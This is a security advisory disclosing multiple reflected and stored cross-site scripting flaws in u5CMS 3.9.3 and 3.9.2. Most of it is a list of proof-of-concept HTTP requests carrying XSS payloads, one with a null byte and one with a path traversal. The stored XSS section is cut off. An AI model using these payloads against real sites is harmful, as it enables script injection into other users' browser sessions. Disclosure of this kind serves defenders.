u5CMS 3.9.3 Multiple Stored And Reflected XSS Vulnerabilities Vendor: Stefan P. Minder Product web page: http://www.yuba.ch Affected version: 3.9.3 and 3.9.2 Summary: u5CMS is a little, handy Content Management System for medium-sized websites, conference / congress / submission administration, review processes, personalized serial mails, PayPal payments and online surveys based on PHP and MySQL and Apache. Desc: u5CMS suffers from multiple stored and reflected cross-site scripting vulnerabilities. Input passed to several POST and GET parameters is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache 2.4.10 (Win32) PHP 5.6.3 MySQL 5.6.21 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5223 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5223.php 29.12.2014 --- Reflected XSS: ============== GET /u5cms/index.php?c=start">&l=e&p=1&r= HTTP/1.1 GET /u5cms/index.php?i=1">&p=1&c=start&l=d HTTP/1.1 GET /u5cms/index.php?c=start&l=e">&p=1&r= HTTP/1.1 GET /u5cms/index.php?c=start&l=e&p=1">&r= HTTP/1.1 GET /u5cms/u5admin/cookie.php?a=i2_l%00%3balert(5)//&b=d HTTP/1.1 GET /u5cms/u5admin/cookie.php?a=i2_l&b=%3balert(6)// HTTP/1.1 GET /u5cms/u5admin/copy.php?name=album"> HTTP/1.1 GET /u5cms/u5admin/delete.php?name=a"> HTTP/1.1 GET /u5cms/u5admin/deletefile.php?typ=d&name=shortreference&f=../r/shortreference/shortreference_en.php.txt'%3balert(9)// HTTP/1.1 GET /u5cms/u5admin/deletefile.php?typ=d'%3balert(10)//&name=shortreference&f=../r/shortreference/shortreference_en.php.txt HTTP/1.1 GET /u5cms/u5admin/done.php?n=inserted%20test"> HTTP/1.1 GET /u5cms/u5admin/editor.php?c=c"> HTTP/1.1 POST /u5cms/u5admin/meta2.php?typ=a&uri=metai.php'%3balert(13)// HTTP/1.1 GET /u5cms/u5admin/notdone.php?n=wrong%20name,%20not%20deleted%20 HTTP/1.1 GET /u5cms/u5admin/rename2.php?name=valbum&newname=valbum'%3balert(15)//&typ=a HTTP/1.1 GET /u5cms/u5admin/sendfile.php?name=shortreference&l=_frd">&typ=d HTTP/1.1 GET /u5cms/u5admin/characters.php?more=335&s=335"> HTTP/1.1 Stored XSS: =========== --